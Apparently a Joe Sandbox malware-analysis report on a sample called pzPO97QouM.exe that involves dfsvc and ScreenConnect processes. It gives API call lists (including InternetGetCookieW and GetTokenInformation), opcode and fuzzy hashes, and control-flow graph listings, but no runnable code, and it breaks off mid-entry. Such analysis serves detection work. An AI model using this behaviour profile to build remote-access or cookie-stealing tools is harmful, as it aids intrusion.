                                                                                                                                                                                                  • Opcode ID: ac78d35d4bbe81f954df43e685fc2ac64272333a19e3bc2de1aea8e81f413ea0
                                                                                                                                                                                                  • Instruction ID: 990a0ea2732f141510adf117d220de09d90e8856b8a343d0cff7a1fdb4ee55b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac78d35d4bbe81f954df43e685fc2ac64272333a19e3bc2de1aea8e81f413ea0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F0307AEAE260AFD7516F15FC11B453B65A794710300425BF4025A2F1C73505C1AFC2
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pzPO97QouM.exe,00000104), ref: 009C2F93
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C305E
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3068
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                                  • API String ID: 2506810119-2218500043
                                                                                                                                                                                                  • Opcode ID: f2604e429bd5e8a58741c72a28fbd4c69f23a202193f8147c2fe41485996aab3
                                                                                                                                                                                                  • Instruction ID: ee520b9392246e334639a43aadda0a8c9befbbdd42cef3cf9e7da087dbc00460
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2604e429bd5e8a58741c72a28fbd4c69f23a202193f8147c2fe41485996aab3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24313E72E04258AFDB21DB999C81FAEBBFCEB85710F10806FF40497251D7758A40DB92
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009C2594,00000000,?,009D1B50,?,?,?,009C2737,00000004,InitializeCriticalSectionEx,009CBC48,InitializeCriticalSectionEx), ref: 009C25F0
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C2594,00000000,?,009D1B50,?,?,?,009C2737,00000004,InitializeCriticalSectionEx,009CBC48,InitializeCriticalSectionEx,00000000,?,009C24C7), ref: 009C25FA
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009C2622
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                  • Opcode ID: e641e805c9dd8d5bbe82128f423e5d9b095933e65991d5731eaf1f34a90cfa15
                                                                                                                                                                                                  • Instruction ID: 0b3e37d75aa5b932c1ff55e4e60dddbe6ab37cdfd4a6f9c995de02ba7365be1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e641e805c9dd8d5bbe82128f423e5d9b095933e65991d5731eaf1f34a90cfa15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0DF30E84304BBEF211B60EC07F1A3F18BB00B82F100025F90CE80E2E7B1EE50A956
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue), ref: 009C580F
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue,009CC4D8,FlsSetValue,00000000,00000364,?,009C44F6), ref: 009C581B
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue,009CC4D8,FlsSetValue,00000000), ref: 009C5829
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                  • Opcode ID: 86175008adfc11fe0872889424599e16ca9ca15271d5cc3567b7c9384d3428af
                                                                                                                                                                                                  • Instruction ID: 49f5b4282fce75f3f1a820e1a5c66b571c97b53a1d78262a57be8c2f58287dc7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86175008adfc11fe0872889424599e16ca9ca15271d5cc3567b7c9384d3428af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E01AC32E19626ABC7218A689C45F57775CAF057A1B120528F916D7140D724ED81C6E1
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4A27
                                                                                                                                                                                                    • Part of subcall function 009C474D: IsProcessorFeaturePresent.KERNEL32(00000017,009C473C,00000000,?,00000004,00000000,?,?,?,?,009C4749,00000000,00000000,00000000,00000000,00000000), ref: 009C474F
                                                                                                                                                                                                    • Part of subcall function 009C474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009C4771
                                                                                                                                                                                                    • Part of subcall function 009C474D: TerminateProcess.KERNEL32(00000000), ref: 009C4778
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                  • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                  • Instruction ID: 9c341d827e1060e7b4b5105d397c43e98ee325505411febd08250a89c844760e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62518E75E00219AFDF14CFA8C891FAEBBB9EF98710F24816EE454E7341E6359A018B51

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:15.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:180
                                                                                                                                                                                                  Total number of Limit Nodes:22

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ]
                                                                                                                                                                                                  • API String ID: 0-3352871620

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1548 7ff887cffd8d-7ff887cffd93 1548->1548 1549 7ff887cffd95-7ff887cffd9b 1548->1549 1551 7ff887cffd9d-7ff887cffda3 1549->1551 1551->1551 1552 7ff887cffda5 1551->1552 1553 7ff887cffda7-7ff887cffdad 1552->1553 1553->1553 1554 7ff887cffdaf-7ff887cffdb4 1553->1554 1556 7ff887cffdb7-7ff887cffdbd 1554->1556 1556->1556 1557 7ff887cffdbe-7ff887cffdc4 1556->1557 1559 7ff887cffdc7-7ff887cffdcd 1557->1559 1559->1559 1560 7ff887cffdce-7ff887d00198 1559->1560 1566 7ff887d001a5-7ff887d001aa 1560->1566 1567 7ff887d0019a-7ff887d001a2 1560->1567 1568 7ff887d001b7-7ff887d001c3 1566->1568 1569 7ff887d001ac-7ff887d001b4 1566->1569 1567->1566 1570 7ff887d00249-7ff887d00250 1568->1570 1571 7ff887d001c9-7ff887d001fc 1568->1571 1569->1568 1573 7ff887d00252-7ff887d00258 1571->1573 1574 7ff887d001fe-7ff887d00200 1571->1574 1580 7ff887d0025a-7ff887d002c7 InternetGetCookieW 1573->1580 1575 7ff887d00202-7ff887d00214 1574->1575 1576 7ff887d00239-7ff887d00247 1574->1576 1577 7ff887d00216 1575->1577 1578 7ff887d00218-7ff887d0022b 1575->1578 1576->1580 1577->1578 1578->1578 1581 7ff887d0022d-7ff887d00235 1578->1581 1582 7ff887d002cf-7ff887d002e2 1580->1582 1583 7ff887d002c9 1580->1583 1581->1576 1584 7ff887d00307-7ff887d00339 call 7ff887d00355 1582->1584 1585 7ff887d002e4-7ff887d00306 1582->1585 1583->1582 1589 7ff887d00340-7ff887d00354 1584->1589 1590 7ff887d0033b 1584->1590 1585->1584 1590->1589
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (]X
                                                                                                                                                                                                  • API String ID: 0-3761561620
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2246880169.00007FF887BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BDD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887bdd000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:12.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 12050 7ff887cc3df2 12051 7ff887cdf470 CloseHandle 12050->12051 12053 7ff887cdf4eb 12051->12053 12054 7ff887cc4890 12055 7ff887cc4899 GetTokenInformation 12054->12055 12057 7ff887cdf2d7 12055->12057 12046 7ff887cc84b8 12047 7ff887cc84bf SetProcessMitigationPolicy 12046->12047 12049 7ff887cc8552 12047->12049 12058 7ff887ccf67b 12059 7ff887ccf687 CreateFileW 12058->12059 12061 7ff887ccf7bc 12059->12061

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 422 7ff887cc4890-7ff887cc48d9 428 7ff887cc48dc 422->428 428->428 429 7ff887cc48de-7ff887cc4949 428->429 437 7ff887cc494c 429->437 437->437 438 7ff887cc494e-7ff887cdf2d5 GetTokenInformation 437->438 444 7ff887cdf2d7 438->444 445 7ff887cdf2dd-7ff887cdf30e 438->445 444->445
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4114910276-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 447 7ff887ccf67b-7ff887ccf710 452 7ff887ccf712-7ff887ccf717 447->452 453 7ff887ccf71a-7ff887ccf7ba CreateFileW 447->453 452->453 455 7ff887ccf7c2-7ff887ccf7f5 453->455 456 7ff887ccf7bc 453->456 456->455
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 562 7ff887cc84b8-7ff887cc8550 SetProcessMitigationPolicy 565 7ff887cc8552 562->565 566 7ff887cc8558-7ff887cc8587 562->566 565->566
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 568 7ff887cc3eaa-7ff887cc84ef 570 7ff887cc84f6-7ff887cc8550 SetProcessMitigationPolicy 568->570 571 7ff887cc8552 570->571 572 7ff887cc8558-7ff887cc8587 570->572 571->572
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt$t*Jt
                                                                                                                                                                                                  • API String ID: 0-3942707866
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 0-76226702
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ['
                                                                                                                                                                                                  • API String ID: 0-410297704
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt
                                                                                                                                                                                                  • API String ID: 0-2906470731
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3833665bdb841f002dd0a8bdb4f43dc7ce9560d1391406fd5674306a5db529cd
                                                                                                                                                                                                  • Instruction ID: 27c7b90db47734d7a287dc59a8823e2cd0bb4a2748ff930bc3c1f53620aa84db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3833665bdb841f002dd0a8bdb4f43dc7ce9560d1391406fd5674306a5db529cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F515C70E003099FDB05DFB5E848BDDBBB2FF89300F108569E415AB294EB74A995CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cc05d6c12d500c319ac7bf8936772be7b4d5a964a1b81decd39333765e6fcdba
                                                                                                                                                                                                  • Instruction ID: f2febb1e975a180a3a15263347806378440137e3e7df88633328d5f551335ef1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc05d6c12d500c319ac7bf8936772be7b4d5a964a1b81decd39333765e6fcdba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B141B331A00205CBDB19EF68E498A6EBB76EFC4714B04C159DD09AB245DB34EC46CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 211b1b9cfaf58523cc088af8880a19e35227447a2b9cfe0cfd5d01004a3629ab
                                                                                                                                                                                                  • Instruction ID: 2e3d2991228c4d17f243d43a9eff6da7f3200fd411d87d005f292126aef5620f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211b1b9cfaf58523cc088af8880a19e35227447a2b9cfe0cfd5d01004a3629ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C416C74A00709CFCB64CF39D848A6ABBF5FF48755B108A28D856D77A1EB30E845CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f5ef9bf673b2d44a87d3a8825efde83b3e7484686cce8f2458b6da09310b3d17
                                                                                                                                                                                                  • Instruction ID: 2e3f8844e42c030fc38d2340a8a8bd64bdaa0d40af280da8aee996cf165b8340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ef9bf673b2d44a87d3a8825efde83b3e7484686cce8f2458b6da09310b3d17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99418C74A00709CFDB74CF39D848AAABBF1FF48754B144A28D856D76A1EB30E845CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7211e6de351de465a20ab1542f516de4c299a3dea9dec650052a1755457be973
                                                                                                                                                                                                  • Instruction ID: 1aa4a145d0cc572ef31654dd3d17d90ff9112f6443d01649842989f4c1db912b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7211e6de351de465a20ab1542f516de4c299a3dea9dec650052a1755457be973
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE316D32B002058FDB14AE69C498AAFF7F5EF8A798F108469D90AE7750DB30DC058B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 05bae1cba6b099d126e2ea6608b681dcd2bc3af624a8b24b49f42f8c4dfac16f
